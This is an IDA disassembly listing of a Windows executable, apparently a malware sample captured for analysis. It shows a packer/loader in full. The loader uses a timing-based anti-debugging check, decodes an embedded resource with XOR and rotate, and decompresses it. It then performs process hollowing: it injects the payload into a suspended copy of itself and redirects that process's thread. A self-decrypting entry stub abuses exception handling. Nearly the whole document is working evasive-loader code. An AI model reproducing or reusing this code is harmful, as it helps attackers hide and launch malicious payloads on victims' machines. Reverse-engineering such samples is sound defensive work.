;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 69147409299E44813B0CBEB9D840D7DD
; File Name : u:\work\69147409299e44813b0cbeb9d840d7dd_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 10000000
; Section 1. (virtual address 00001000)
; Virtual size : 000009BF ( 2495.)
; Section size in file : 00000A00 ( 2560.)
; Offset to raw data for section: 00000400
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 10001000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
db 6 dup(90h)
; ---------------------------------------------------------------------------
call sub_10001022
call sub_10001078
push lpAddress
call sub_10001208
push 0
call ExitProcess ; ExitProcess
; =============== S U B R O U T I N E =======================================
sub_10001022 proc near ; CODE XREF: .text:10001006�p
call GetTickCount ; GetTickCount
mov dword_10003774, eax
push 64h ; dwMilliseconds
call Sleep ; Sleep
call GetTickCount ; GetTickCount
mov dword_10003778, eax
push 64h ; dwMilliseconds
call Sleep ; Sleep
call GetTickCount ; GetTickCount
mov dword_1000377C, eax
mov eax, dword_10003774
mov ebx, dword_10003778
sub ebx, eax
mov ecx, dword_1000377C
sub ecx, eax
cmp ebx, 64h
jnb short locret_10001077
cmp ecx, 0C8h
jnb short locret_10001077
push 0 ; uExitCode
call ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
locret_10001077: ; CODE XREF: sub_10001022+44�j
; sub_10001022+4C�j
retn
sub_10001022 endp
; =============== S U B R O U T I N E =======================================
sub_10001078 proc near ; CODE XREF: .text:1000100B�p
push 0Ah ; lpType
push 7 ; lpName
push 0 ; hModule
call FindResourceA ; FindResourceA
mov hResInfo, eax
push eax ; hResInfo
push 0 ; hModule
call LoadResource ; LoadResource
mov hResData, eax
push hResInfo ; hResInfo
push 0 ; hModule
call SizeofResource ; SizeofResource
mov dword_10003730, eax
push hResData ; hResData
call LockResource ; LockResource
mov dword_10003728, eax
mov ecx, dword_10003730
mov edi, dword_10003728
jmp short loc_100010CE
; ---------------------------------------------------------------------------
loc_100010C5: ; CODE XREF: sub_10001078+58�j
dec ecx
rol byte ptr [ecx+edi], 8
xor byte ptr [ecx+edi], 8
loc_100010CE: ; CODE XREF: sub_10001078+4B�j
or ecx, ecx
jnz short loc_100010C5
push dword_10003728
call sub_100014B0
add esp, 4
mov dwSize, eax
push 4 ; flProtect
push 1000h ; flAllocationType
push dwSize ; dwSize
push 0 ; lpAddress
call VirtualAlloc ; VirtualAlloc
mov lpAddress, eax
push dwSize
push lpAddress
push dword_10003730
push dword_10003728
call sub_100014E0
add esp, 10h
retn
sub_10001078 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000111F proc near ; CODE XREF: sub_10001208+A9�p
; sub_10001208+10B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
mov eax, [ebp+arg_0]
div [ebp+arg_4]
or edx, edx
jnz short loc_10001133
mov eax, [ebp+arg_0]
jmp short locret_10001142
; ---------------------------------------------------------------------------
loc_10001133: ; CODE XREF: sub_1000111F+D�j
mov edx, 0
mov eax, [ebp+arg_0]
div [ebp+arg_4]
inc eax
mul [ebp+arg_4]
locret_10001142: ; CODE XREF: sub_1000111F+12�j
leave
retn 8
sub_1000111F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001146 proc near ; CODE XREF: sub_10001208+12�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov esi, [ebp+arg_0]
add esi, [esi+3Ch]
mov dword_10003738, esi
mov eax, [esi+38h]
mov dword_1000373C, eax
movzx eax, word ptr [esi+6]
mov dword_10003740, eax
movzx ecx, word ptr [esi+14h]
add ecx, 18h
add esi, ecx
mov dword_10003744, esi
mov esi, dword_10003738
xor edx, edx
mov eax, [esi+54h]
div dword_1000373C
or edx, edx
jnz short loc_10001194
mov eax, [esi+54h]
mov dword_10003770, eax
jmp short loc_100011AC
; ---------------------------------------------------------------------------
loc_10001194: ; CODE XREF: sub_10001146+42�j
xor edx, edx
mov eax, [esi+54h]
div dword_1000373C
inc eax
mul dword_1000373C
add dword_10003770, eax
loc_100011AC: ; CODE XREF: sub_10001146+4C�j
mov ecx, 0
mov edi, dword_10003744
loc_100011B7: ; CODE XREF: sub_10001146+B7�j
cmp ecx, dword_10003740
jz short loc_100011FF
push ecx
cmp dword ptr [edi+8], 0
jz short loc_100011F8
xor edx, edx
mov eax, [edi+8]
div dword_1000373C
or edx, edx
jnz short loc_100011E0
mov eax, [edi+8]
add dword_10003770, eax
jmp short loc_100011F8
; ---------------------------------------------------------------------------
loc_100011E0: ; CODE XREF: sub_10001146+8D�j
xor edx, edx
mov eax, [edi+8]
div dword_1000373C
inc eax
mul dword_1000373C
add dword_10003770, eax
loc_100011F8: ; CODE XREF: sub_10001146+7E�j
; sub_10001146+98�j
pop ecx
inc ecx
add edi, 28h
jmp short loc_100011B7
; ---------------------------------------------------------------------------
loc_100011FF: ; CODE XREF: sub_10001146+77�j
mov eax, dword_10003770
leave
retn 4
sub_10001146 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001208 proc near ; CODE XREF: .text:10001016�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov esi, [ebp+arg_0]
add esi, [esi+3Ch]
mov dword_10003748, esi
push [ebp+arg_0]
call sub_10001146
mov dword_10003754, eax
push 4 ; flProtect
push 1000h ; flAllocationType
push dword_10003754 ; dwSize
push 0 ; lpAddress
call VirtualAlloc ; VirtualAlloc
mov lpBuffer, eax
mov eax, lpBuffer
mov dword_1000375C, eax
mov esi, dword_10003748
mov eax, [esi+54h]
mov dword_10003760, eax
movzx ecx, word ptr [esi+14h]
add ecx, 18h
add esi, ecx
mov dword_10003764, esi
mov esi, dword_10003744
mov edi, dword_10003738
mov ecx, 0
mov ebx, dword_10003760
loc_1000127B: ; CODE XREF: sub_10001208+8C�j
cmp ecx, dword_10003740
jz short loc_10001296
cmp [esi+14h], ebx
jnb short loc_10001290
mov eax, [esi+14h]
mov dword_10003760, eax
loc_10001290: ; CODE XREF: sub_10001208+7E�j
inc ecx
add esi, 28h
jmp short loc_1000127B
; ---------------------------------------------------------------------------
loc_10001296: ; CODE XREF: sub_10001208+79�j
push edi
mov edi, dword_1000375C
mov esi, [ebp+arg_0]
mov ecx, dword_10003760
rep movsb
pop edi
mov eax, [edi+54h]
mov ebx, [edi+38h]
push ebx
push eax
call sub_1000111F
add dword_1000375C, eax
mov ecx, 0
mov esi, dword_10003744
mov edi, dword_10003738
loc_100012CD: ; CODE XREF: sub_10001208+136�j
cmp ecx, dword_10003740
jz short loc_10001340
push ecx
cmp dword ptr [esi+10h], 0
jbe short loc_10001320
mov eax, [esi+10h]
mov dword_10003768, eax
cmp eax, [esi+8]
jbe short loc_100012F1
mov eax, [esi+8]
mov dword_10003768, eax
loc_100012F1: ; CODE XREF: sub_10001208+DF�j
mov eax, [esi+14h]
add eax, [ebp+arg_0]
push edi
push esi
mov edi, dword_1000375C
mov esi, eax
mov ecx, dword_10003768
rep movsb
pop esi
pop edi
mov eax, [esi+8]
mov ebx, [edi+38h]
push ebx
push eax
call sub_1000111F
add dword_1000375C, eax
jmp short loc_10001339
; ---------------------------------------------------------------------------
loc_10001320: ; CODE XREF: sub_10001208+D2�j
cmp dword ptr [esi+8], 0
jz short loc_10001339
mov eax, [esi+8]
mov ebx, [edi+38h]
push ebx
push eax
call sub_1000111F
add dword_1000375C, eax
loc_10001339: ; CODE XREF: sub_10001208+116�j
; sub_10001208+11C�j
pop ecx
inc ecx
add esi, 28h
jmp short loc_100012CD
; ---------------------------------------------------------------------------
loc_10001340: ; CODE XREF: sub_10001208+CB�j
push 78h ; nSize
push offset CommandLine ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
push offset ProcessInformation ; lpProcessInformation
push offset StartupInfo ; lpStartupInfo
push 0 ; lpCurrentDirectory
push 0 ; lpEnvironment
push 4 ; dwCreationFlags
push 0 ; bInheritHandles
push 0 ; lpThreadAttributes
push 0 ; lpProcessAttributes
push offset CommandLine ; lpCommandLine
push 0 ; lpApplicationName
call CreateProcessA ; CreateProcessA
mov Context.ContextFlags, 10007h
push offset Context ; lpContext
push ProcessInformation.hThread ; hThread
call GetThreadContext ; GetThreadContext
mov ebx, Context._Ebx
add ebx, 8
push 0 ; lpNumberOfBytesRead
push 4 ; nSize
push offset dword_1000376C ; lpBuffer
push ebx ; lpBaseAddress
push ProcessInformation.hProcess ; hProcess
call ReadProcessMemory ; ReadProcessMemory
push 40h ; flProtect
push 3000h ; flAllocationType
push dword_10003754 ; dwSize
push dword ptr [edi+34h] ; lpAddress
push ProcessInformation.hProcess ; hProcess
call VirtualAllocEx ; VirtualAllocEx
push 0 ; lpNumberOfBytesWritten
push dword_10003754 ; nSize
push lpBuffer ; lpBuffer
push dword ptr [edi+34h] ; lpBaseAddress
push ProcessInformation.hProcess ; hProcess
call WriteProcessMemory ; WriteProcessMemory
mov ebx, Context._Ebx
add ebx, 8
push 0 ; lpNumberOfBytesWritten
push 4 ; nSize
lea eax, [edi+34h]
push eax ; lpBuffer
push ebx ; lpBaseAddress
push ProcessInformation.hProcess ; hProcess
call WriteProcessMemory ; WriteProcessMemory
mov eax, [edi+34h]
add eax, [edi+28h]
mov Context._Eax, eax
push offset Context ; lpContext
push ProcessInformation.hThread ; hThread
call SetThreadContext ; SetThreadContext
push ProcessInformation.hThread ; hThread
call ResumeThread ; ResumeThread
push 8000h ; dwFreeType
push 0 ; dwSize
push lpAddress ; lpAddress
call VirtualFree ; VirtualFree
push 8000h ; dwFreeType
push 0 ; dwSize
push lpBuffer ; lpAddress
call VirtualFree ; VirtualFree
leave
retn 4
sub_10001208 endp
; [00000006 BYTES: COLLAPSED FUNCTION CreateProcessA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION FindResourceA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleFileNameA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetThreadContext. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetTickCount. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION LoadResource. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION LockResource. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ReadProcessMemory. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ResumeThread. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION SetThreadContext. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION SizeofResource. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Sleep. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION VirtualAlloc. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION VirtualAllocEx. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION VirtualFree. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION WriteProcessMemory. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_100014B0 proc near ; CODE XREF: sub_10001078+60�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
pusha
mov esi, [esp+20h+arg_0]
mov ebx, [esi]
or eax, 0FFFFFFFFh
cmp ebx, 32335041h
jnz short loc_100014CD
mov ebx, [esi+4]
cmp ebx, 18h
jb short loc_100014CD
mov eax, [esi+10h]
loc_100014CD: ; CODE XREF: sub_100014B0+10�j
; sub_100014B0+18�j
mov [esp+20h+var_4], eax
popa
retn
sub_100014B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_100014E0 proc near ; CODE XREF: sub_10001078+9E�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
pusha
mov esi, [esp+20h+arg_0]
mov ecx, [esp+20h+arg_4]
mov edi, [esp+20h+arg_8]
test esi, esi
jz short loc_10001557
test edi, edi
jz short loc_10001557
cmp ecx, 18h
jb short loc_10001557
mov ebx, [esi]
cmp ebx, 32335041h
jnz short loc_10001557
mov ebx, [esi+4]
cmp ebx, 18h
jb short loc_10001557
sub ecx, ebx
jb short loc_10001557
cmp [esi+8], ecx
ja short loc_10001557
add ebx, esi
push dword ptr [esi+8]
push ebx
call sub_10001840
add esp, 8
cmp eax, [esi+0Ch]
jnz short loc_10001557
mov ecx, [esp+20h+arg_C]
cmp [esi+10h], ecx
ja short loc_10001557
push ecx
push edi
push dword ptr [esi+8]
push ebx
call sub_10001560
add esp, 10h
cmp eax, [esi+10h]
jnz short loc_10001557
mov ebx, eax
push eax
push edi
call sub_10001840
add esp, 8
cmp eax, [esi+14h]
mov eax, ebx
jz short loc_1000155A
loc_10001557: ; CODE XREF: sub_100014E0+F�j
; sub_100014E0+13�j ...
or eax, 0FFFFFFFFh
loc_1000155A: ; CODE XREF: sub_100014E0+75�j
mov [esp+20h+var_4], eax
popa
retn
sub_100014E0 endp
; =============== S U B R O U T I N E =======================================
sub_10001560 proc near ; CODE XREF: sub_100014E0+57�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
pusha
mov esi, [esp+20h+arg_0]
mov eax, [esp+20h+arg_4]
mov edi, [esp+20h+arg_8]
mov ecx, [esp+20h+arg_C]
push eax
push ecx
test esi, esi
jz loc_10001826
test edi, edi
jz loc_10001826
cld
xor edx, edx
loc_10001586: ; CODE XREF: sub_10001560:loc_100015C0�j
sub [esp+28h+var_24], 1
jb loc_10001826
mov al, [esi]
add esi, 1
sub [esp+28h+var_28], 1
jb loc_10001826
mov [edi], al
add edi, 1
mov ebx, 2
loc_100015AA: ; CODE XREF: sub_10001560+129�j
; sub_10001560+1D4�j ...
add dl, dl
jnz short loc_100015C0
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100015C0: ; CODE XREF: sub_10001560+4C�j
jnb short loc_10001586
add dl, dl
jnz short loc_100015D8
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100015D8: ; CODE XREF: sub_10001560+64�j
jnb loc_1000168E
xor eax, eax
add dl, dl
jnz short loc_100015F6
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100015F6: ; CODE XREF: sub_10001560+82�j
jnb loc_100017DB
add dl, dl
jnz short loc_10001612
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001612: ; CODE XREF: sub_10001560+9E�j
adc eax, eax
add dl, dl
jnz short loc_1000162A
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_1000162A: ; CODE XREF: sub_10001560+B6�j
adc eax, eax
add dl, dl
jnz short loc_10001642
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001642: ; CODE XREF: sub_10001560+CE�j
adc eax, eax
add dl, dl
jnz short loc_1000165A
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_1000165A: ; CODE XREF: sub_10001560+E6�j
adc eax, eax
jz loc_10001677
mov ebx, [esp+28h+arg_C]
sub ebx, [esp+28h+var_28]
cmp eax, ebx
ja loc_10001826
mov ebx, edi
sub ebx, eax
mov al, [ebx]
loc_10001677: ; CODE XREF: sub_10001560+FC�j
sub [esp+28h+var_28], 1
jb loc_10001826
mov [edi], al
inc edi
mov ebx, 2
jmp loc_100015AA
; ---------------------------------------------------------------------------
loc_1000168E: ; CODE XREF: sub_10001560:loc_100015D8�j
mov eax, 1
loc_10001693: ; CODE XREF: sub_10001560:loc_100016C7�j
add dl, dl
jnz short loc_100016A9
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100016A9: ; CODE XREF: sub_10001560+135�j
adc eax, eax
jb loc_10001826
add dl, dl
jnz short loc_100016C7
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100016C7: ; CODE XREF: sub_10001560+153�j
jb short loc_10001693
sub eax, ebx
mov ebx, 1
jnz loc_10001739
mov ecx, 1
loc_100016DB: ; CODE XREF: sub_10001560:loc_1000170F�j
add dl, dl
jnz short loc_100016F1
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100016F1: ; CODE XREF: sub_10001560+17D�j
adc ecx, ecx
jb loc_10001826
add dl, dl
jnz short loc_1000170F
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_1000170F: ; CODE XREF: sub_10001560+19B�j
jb short loc_100016DB
push ecx
mov ecx, [esp+2Ch+arg_C]
sub ecx, [esp+2Ch+var_28]
cmp ebp, ecx
pop ecx
ja loc_10001826
sub [esp+28h+var_28], ecx
jb loc_10001826
push esi
mov esi, edi
sub esi, ebp
rep movsb
pop esi
jmp loc_100015AA
; ---------------------------------------------------------------------------
loc_10001739: ; CODE XREF: sub_10001560+170�j
dec eax
test eax, 0FF000000h
jnz loc_10001826
shl eax, 8
sub [esp+28h+var_24], 1
jb loc_10001826
mov al, [esi]
inc esi
mov ebp, eax
mov ecx, 1
loc_1000175D: ; CODE XREF: sub_10001560:loc_10001791�j
add dl, dl
jnz short loc_10001773
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001773: ; CODE XREF: sub_10001560+1FF�j
adc ecx, ecx
jb loc_10001826
add dl, dl
jnz short loc_10001791
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001791: ; CODE XREF: sub_10001560+21D�j
jb short loc_1000175D
cmp eax, 7D00h
sbb ecx, 0FFFFFFFFh
cmp eax, 500h
sbb ecx, 0FFFFFFFFh
cmp eax, 80h
adc ecx, 0
cmp eax, 80h
adc ecx, 0
push ecx
mov ecx, [esp+2Ch+arg_C]
sub ecx, [esp+2Ch+var_28]
cmp eax, ecx
pop ecx
ja loc_10001826
sub [esp+28h+var_28], ecx
jb loc_10001826
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp loc_100015AA
; ---------------------------------------------------------------------------
loc_100017DB: ; CODE XREF: sub_10001560:loc_100015F6�j
sub [esp+28h+var_24], 1
jb loc_10001826
mov al, [esi]
inc esi
xor ecx, ecx
shr al, 1
jz loc_1000182E
adc ecx, 2
mov ebp, eax
push ecx
mov ecx, [esp+2Ch+arg_C]
sub ecx, [esp+2Ch+var_28]
cmp eax, ecx
pop ecx
ja loc_10001826
sub [esp+28h+var_28], ecx
jb loc_10001826
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
mov ebx, 1
jmp loc_100015AA
; ---------------------------------------------------------------------------
loc_10001826: ; CODE XREF: sub_10001560+15�j
; sub_10001560+1D�j ...
add esp, 8
popa
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_1000182E: ; CODE XREF: sub_10001560+28E�j
add esp, 8
sub edi, [esp+20h+arg_8]
mov [esp+20h+var_4], edi
popa
retn
sub_10001560 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001840 proc near ; CODE XREF: sub_100014E0+3B�p
; sub_100014E0+68�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov esi, [esp+20h+arg_0]
mov ecx, [esp+20h+arg_4]
mov edi, offset dword_10003320
sub eax, eax
test esi, esi
jz loc_10001920
sub eax, 1
test ecx, ecx
jz loc_1000191E
loc_10001863: ; CODE XREF: sub_10001840+3C�j
test esi, 3
jz short loc_1000187E
xor al, [esi]
inc esi
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
dec ecx
jnz short loc_10001863
loc_1000187E: ; CODE XREF: sub_10001840+29�j
mov edx, ecx
and edx, 7
shr ecx, 3
jz loc_10001905
loc_1000188C: ; CODE XREF: sub_10001840+BF�j
xor eax, [esi]
add esi, 4
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
xor eax, [esi]
add esi, 4
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
dec ecx
jnz loc_1000188C
loc_10001905: ; CODE XREF: sub_10001840+46�j
mov ecx, edx
test ecx, ecx
jz short loc_1000191E
loc_1000190B: ; CODE XREF: sub_10001840+DC�j
xor al, [esi]
inc esi
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
dec ecx
jnz short loc_1000190B
loc_1000191E: ; CODE XREF: sub_10001840+1D�j
; sub_10001840+C9�j
not eax
loc_10001920: ; CODE XREF: sub_10001840+12�j
mov [esp+20h+var_4], eax
popa
retn
sub_10001840 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_10001941
call sub_100019B2
mov ebp, fs:0
lea ebp, [ebp+8]
jmp loc_10001971
start endp
; =============== S U B R O U T I N E =======================================
sub_10001941 proc near ; CODE XREF: start+3�p
push dword ptr fs:0
mov fs:0, esp
xor eax, eax
push 80000000h
push eax
push 80000000h
push eax
push 80h
push 80000000h
push 80000000h ; lpContext
push eax ; hThread
call ds:__imp_GetThreadContext
loc_10001971: ; CODE XREF: start+16�j
sub edx, edx
sub ecx, ecx
mov cl, 0F0h
loc_10001977: ; CODE XREF: sub_10001941+38�j
inc edx
dec ecx
jnz short loc_10001977
call sub_100019AE
add edi, 0EB77h
push edi
mov ecx, 24D5h
loc_1000198C: ; CODE XREF: sub_10001941+5A�j
mov al, [edi]
sub ax, dx
xchg al, [edi]
add edi, 1
inc edx
dec ecx
cmp ecx, 0
ja short loc_1000198C
pop edi
mov esp, fs:0
pop dword ptr fs:0
leave
jmp edi
sub_10001941 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
sub_100019AE proc near ; CODE XREF: sub_10001941+3A�p
pop edi
push edi
retn
sub_100019AE endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
sub_100019B2 proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_100019B2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 80h
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 000001E8 ( 488.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00000E00
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from kernel32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
extrn __imp_CreateProcessA:dword ; DATA XREF: CreateProcessA�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn __imp_ExitProcess:dword ; DATA XREF: ExitProcess�r
; HRSRC __stdcall FindResourceA(HMODULE hModule, LPCSTR lpName, LPCSTR lpType)
extrn __imp_FindResourceA:dword ; DATA XREF: FindResourceA�r
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
extrn __imp_GetModuleFileNameA:dword ; DATA XREF: GetModuleFileNameA�r
; BOOL __stdcall GetThreadContext(HANDLE hThread, LPCONTEXT lpContext)
extrn __imp_GetThreadContext:dword ; CODE XREF: sub_10001941+2A�p
; DATA XREF: GetThreadContext�r ...
; DWORD __stdcall GetTickCount()
extrn __imp_GetTickCount:dword ; DATA XREF: GetTickCount�r
; HGLOBAL __stdcall LoadResource(HMODULE hModule, HRSRC hResInfo)
extrn __imp_LoadResource:dword ; DATA XREF: LoadResource�r
; LPVOID __stdcall LockResource(HGLOBAL hResData)
extrn __imp_LockResource:dword ; DATA XREF: LockResource�r
; BOOL __stdcall ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead)
extrn __imp_ReadProcessMemory:dword ; DATA XREF: ReadProcessMemory�r
; DWORD __stdcall ResumeThread(HANDLE hThread)
extrn __imp_ResumeThread:dword ; DATA XREF: ResumeThread�r
; BOOL __stdcall SetThreadContext(HANDLE hThread, const CONTEXT *lpContext)
extrn __imp_SetThreadContext:dword ; DATA XREF: SetThreadContext�r
; DWORD __stdcall SizeofResource(HMODULE hModule, HRSRC hResInfo)
extrn __imp_SizeofResource:dword ; DATA XREF: SizeofResource�r
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn __imp_Sleep:dword ; DATA XREF: Sleep�r
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn __imp_VirtualAlloc:dword ; DATA XREF: VirtualAlloc�r
; LPVOID __stdcall VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn __imp_VirtualAllocEx:dword ; DATA XREF: VirtualAllocEx�r
; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType)
extrn __imp_VirtualFree:dword ; DATA XREF: VirtualFree�r
; BOOL __stdcall WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)
extrn __imp_WriteProcessMemory:dword ; DATA XREF: WriteProcessMemory�r
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 10002044h
align 8
dd 2070h, 2 dup(0)
dd 21DAh, 2000h, 5 dup(0)
dd 20B8h, 20CAh, 20D8h, 20E8h, 20FEh, 2112h, 2122h, 2132h
dd 2142h, 2156h, 2166h, 217Ah, 218Ch, 2194h, 21A4h, 21B6h
dd 21C4h, 0
db 40h ; @
align 2
aCreateprocessa db 'CreateProcessA',0
align 2
aA db '',0
aExitprocess db 'ExitProcess',0
aV db '',0
aFindresourcea db 'FindResourceA',0
db 7
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 14Ch
aGetthreadconte db 'GetThreadContext',0
align 2
dw 152h
aGettickcount db 'GetTickCount',0
align 2
dw 1A9h
aLoadresource db 'LoadResource',0
align 2
dw 1B7h
aLockresource db 'LockResource',0
align 2
dw 1FAh
aReadprocessmem db 'ReadProcessMemory',0
dw 207h
aResumethread db 'ResumeThread',0
align 2
dw 24Fh
aSetthreadconte db 'SetThreadContext',0
align 2
dw 25Fh
aSizeofresource db 'SizeofResource',0
align 4
db 60h ; `
db 2, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 81h ;
db 2, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 82h ;
db 2, 56h, 69h
aRtualallocex db 'rtualAllocEx',0
align 2
dw 283h
aVirtualfree db 'VirtualFree',0
db 0A7h ;
db 2, 57h, 72h
aIteprocessmemo db 'iteProcessMemory',0
align 2
aKernel32_dll db 'kernel32.dll',0
align 20h
_rdata ends
; Section 3. (virtual address 00003000)
; Virtual size : 000007F8 ( 2040.)
; Section size in file : 00000800 ( 2048.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
